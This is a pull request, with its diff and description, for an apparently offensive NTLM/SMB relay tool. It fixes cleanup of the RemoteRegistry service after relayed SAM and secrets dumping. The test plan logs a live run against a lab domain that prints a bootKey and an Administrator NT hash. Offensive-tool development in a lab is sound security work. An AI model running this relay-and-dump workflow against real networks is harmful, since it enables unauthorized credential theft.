### PR TITLE
relay: re-TreeConnect IPC$ in RemoteRegistry restore

### DIFF
--- a/pkg/relay/remoteregistry.go
+++ b/pkg/relay/remoteregistry.go
@@ -94,8 +94,18 @@ func ensureRemoteRegistryStarted(client *SMBRelayClient) *remoteRegistryState {
 // it) and re-applies the SERVICE_DISABLED start type (if it was disabled
 // before we enabled it). Errors are logged but not returned; we're on the
 // cleanup path after the real work has completed.
+//
+// The caller's tree state may have moved off IPC$ (e.g., the attack switched
+// to ADMIN$ to download a saved hive), so we re-TreeConnect to IPC$ before
+// opening svcctl. That makes this function safe to invoke from any defer
+// position without coupling it to the attack's tree management.
 func restoreRemoteRegistryState(client *SMBRelayClient, state *remoteRegistryState) {
 	if state == nil || (!state.startedByUs && !state.wasDisabled) {
+		return
+	}
+
+	if err := client.TreeConnect("IPC$"); err != nil {
+		log.Printf("[-] Warning: could not re-tree-connect to IPC$ for RemoteRegistry restore: %v", err)
 		return
 	}
 


### PR DESCRIPTION
## Summary
Follow-up to #19. After a successful relay samdump/secretsdump the deferred `restoreRemoteRegistryState` was calling `CreatePipe("svcctl")` and getting `STATUS_OBJECT_NAME_NOT_FOUND (0xc0000034)`. The attack downloads its hives from `ADMIN$` before returning, which switches the SMB session's tree away from `IPC$`, and svcctl lives on `IPC$`.

Fixed by re-TreeConnect'ing to `IPC$` at the top of `restoreRemoteRegistryState`. The function is now tree-state-agnostic and safe to invoke from any defer position without coupling to the attack's tree management.

## Test plan
- [x] `go build ./...` clean
- [x] `go vet ./...` clean
- [x] `go test ./...` passes
- [x] Live against GOAD: set srv02 `RemoteRegistry` to Stopped+Manual, relayed eddard.stark via `net use`, watched:
  ```
  [*] Service RemoteRegistry is in stopped state
  [*] Starting service RemoteRegistry
  [*] Target system bootKey: 0xd7efaab1c41ab132c3583b4b89791070
  [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
  Administrator:500:...:dbd13e1c4e338284ac4e9874f7de6ef4:::
  ...
  [*] Cleanup complete
  [*] Stopping service RemoteRegistry          ← this is the new behavior
  ```
- [x] Post-attack srv02 state: `Stopped    Manual` (was `Running    Manual` before this fix — service was left running)
- [x] SAM hash output byte-identical to the pre-fix test, so the attack path itself is unchanged